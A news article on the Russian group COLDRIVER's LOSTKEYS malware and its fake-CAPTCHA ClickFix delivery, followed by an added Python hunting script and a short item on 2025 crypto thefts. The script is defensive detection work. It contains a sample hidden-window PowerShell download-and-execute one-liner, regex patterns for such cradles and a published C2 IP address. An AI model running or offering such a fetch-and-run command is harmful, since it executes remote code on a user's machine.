The Russian state-backed espionage group COLDRIVER has deployed a new malware strain, LOSTKEYS, against high-profile Western individuals and organizations, according to a new report from Google Threat Intelligence Group (GTIG).
The threat actor, previously known mainly for credential phishing, is now using more elaborate tooling to steal sensitive documents. LOSTKEYS is delivered through a multi-stage infection chain that begins with a lure website imitating a CAPTCHA check. When the victim "verifies" the CAPTCHA, the page copies a PowerShell command to their clipboard and instructs them to paste and run it. No vulnerability is exploited: the chain depends entirely on the user executing the pasted command, the pattern now widely referred to as ClickFix. That script then runs a series of evasion checks, which Google assesses are meant to avoid executing inside virtual machines, before fetching further stages and, finally, the LOSTKEYS payload.
Once installed, LOSTKEYS steals files matching a hard-coded list of extensions from a set of target directories, collects system information and the list of running processes, and sends all of it to COLDRIVER-controlled infrastructure. Google lists the IP address "165.227.148[.]68" as part of that infrastructure.
Google says it has added the malicious domains to Safe Browsing to limit further exposure.
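The chain above leaves a recognisable trace on the endpoint: a PowerShell process spawned by explorer.exe (the parent of anything launched from the Run dialog) with a download-and-execute one-liner on its command line, followed by an outbound connection to the published IP. The script below is an added example, not code from the article or from Google's report; it scores constructed process-creation records for that ClickFix shape and checks constructed connection records against the defanged IOC quoted above. The record field names (pid, image, parent_image, cmdline, dst_ip) and the scoring weights are this example's own assumptions, not any SIEM's schema.

```python
"""Hunting helper for ClickFix-style PowerShell launches and a C2 IOC.

Added example; field names and weights are assumptions, not a product schema.
"""
import re
import ipaddress

# Defanged IOC exactly as published; refanged at load time so the live
# address never has to be typed into the source.
PUBLISHED_IOC = "165.227.148[.]68"


def refang(indicator):
    """Turn common defanging ('[.]', 'hxxp') back into a matchable value."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


IOC_IPS = {ipaddress.ip_address(refang(PUBLISHED_IOC))}

# Heuristics for a one-liner a victim pasted into Win+R. Each hit adds its
# weight to a score; the threshold is this example's choice, not a standard.
CRADLE_PATTERNS = [
    (r"\biex\b|invoke-expression", 3, "in-memory execution (IEX)"),
    (r"\biwr\b|invoke-webrequest|downloadstring|downloadfile", 3, "download cradle"),
    (r"-w(indow(style)?)?\s+hidden", 2, "hidden window"),
    (r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", 2, "encoded command"),
    (r"-nop\b|-noprofile", 1, "no profile"),
    (r"-ep\s+bypass|-executionpolicy\s+bypass", 1, "execution policy bypass"),
]
ALERT_THRESHOLD = 4


def score_process(event):
    """Score one process-creation record; returns (score, reasons)."""
    image = event.get("image", "").lower()
    parent = event.get("parent_image", "").lower()
    cmd = event.get("cmdline", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    score, reasons = 0, []
    # Run-dialog launches are children of explorer.exe; scripts started from
    # a console, a scheduler or a management agent are not.
    if parent.endswith("explorer.exe"):
        score += 2
        reasons.append("spawned by explorer.exe (Run dialog / shell)")
    for pattern, weight, label in CRADLE_PATTERNS:
        if re.search(pattern, cmd):
            score += weight
            reasons.append(label)
    return score, reasons


def clickfix_alerts(events):
    """Return (pid, score, reasons) for process records at or above threshold."""
    out = []
    for ev in events:
        score, why = score_process(ev)
        if score >= ALERT_THRESHOLD:
            out.append((ev.get("pid"), score, why))
    return out


def ioc_hits(conn_events):
    """Return (pid, dst_ip) for connections whose destination is a known C2 IP."""
    hits = []
    for ev in conn_events:
        try:
            dst = ipaddress.ip_address(ev.get("dst_ip", ""))
        except ValueError:  # malformed or missing address: skip, don't crash
            continue
        if dst in IOC_IPS:
            hits.append((ev.get("pid"), str(dst)))
    return hits


# Constructed sample records (not real telemetry).
SAMPLE_PROCESSES = [
    {"pid": 4120, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe",
     "cmdline": "explorer.exe"},
    {"pid": 5311, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -nop -ep bypass -c "iex (iwr http://example.invalid/captcha -UseBasicParsing)"'},
    {"pid": 6002, "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"pwsh -File C:\scripts\backup.ps1"},
]
SAMPLE_CONNECTIONS = [
    {"pid": 5311, "dst_ip": "165.227.148.68", "dst_port": 443},
    {"pid": 6002, "dst_ip": "10.0.0.5", "dst_port": 445},
    {"pid": 7000, "dst_ip": "not-an-ip", "dst_port": 0},
]

if __name__ == "__main__":
    for pid, score, why in clickfix_alerts(SAMPLE_PROCESSES):
        print(f"[ClickFix] pid={pid} score={score}: {', '.join(why)}")
    for pid, ip in ioc_hits(SAMPLE_CONNECTIONS):
        print(f"[IOC] pid={pid} connected to {ip}")
```

The parent-process condition is what separates a pasted lure from an administrator's own scripts: the benign pwsh.exe launched from cmd.exe scores zero even though it is PowerShell, while the explorer.exe child with a hidden-window download cradle scores well above the threshold. An IP match alone is weak evidence (shared hosting churns), so it is reported separately rather than folded into the process score.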
COLDRIVER's targeting profile includes Western diplomats, journalists, and policy experts. LOSTKEYS continues a shift that started in early 2024, when the group, until then known almost entirely for credential phishing, was first observed deploying custom malware: SPICA, a backdoor capable of executing shell commands and uploading and downloading files.
The discovery of LOSTKEYS comes amid a broader surge in cyberattacks. According to a separate report by cybersecurity firm Hacken, cryptocurrency-related hacks have already inflicted over $2 billion in losses in Q1 2025, surpassing all of 2024’s totals.
Hacken attributes the spike to persistent operational-security and access-control lapses, even at leading centralized and decentralized platforms, and to attackers' growing reliance on social engineering.
The bulk of these losses comes from a single incident: the roughly $1.5 billion theft from Bybit in February, widely attributed to the North Korea-linked Lazarus Group.
If you want to read more news articles like this, visit DeFi Planet and follow us on Twitter, LinkedIn, Facebook, Instagram, and CoinMarketCap Community.